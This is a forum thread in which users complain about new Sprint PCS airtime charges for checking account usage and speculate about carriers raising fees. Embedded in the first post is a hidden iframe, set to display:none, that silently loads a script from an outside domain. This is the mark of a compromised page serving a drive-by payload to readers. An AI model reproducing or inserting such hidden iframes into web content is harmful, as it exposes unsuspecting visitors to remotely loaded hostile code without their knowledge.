+ Reply to Thread

Thumbs down New Sprint Charges

My SprintPCS bill arrived today and on page 1 I found the following "Important Notice!":

"Effective August 2002, you will incur normal airtime charges when pressing *4 and *5 on your PCS Phone to access your account usage information."

What's that Customer Retention number again...?!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Richard

PHO
    Broward County Florida, "Home of the Hanging Chad"

this is unfortunate

this is unfortunate and really a bit silly. After the mountain of new charges as they relate to the 3g plans and data are revealed. it might be time to shop for a new provider. Unfortunatly, if you want data services, it looks like your stuck with a large scale provider. and those - Verizon/ sprint have been slowly upping charges, changing "night" times ect.

FYI this is all because we are buying fewer cell phones and we are leveling off in the number of "new users" in the market. For the last few years we saw everyone jumping on board getting a phone, now they have us hooked and profit margins lower, plus the cost of new technology, get ready for a bumpy ride.

Dont' you love a never ending hardly coherent thought?

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."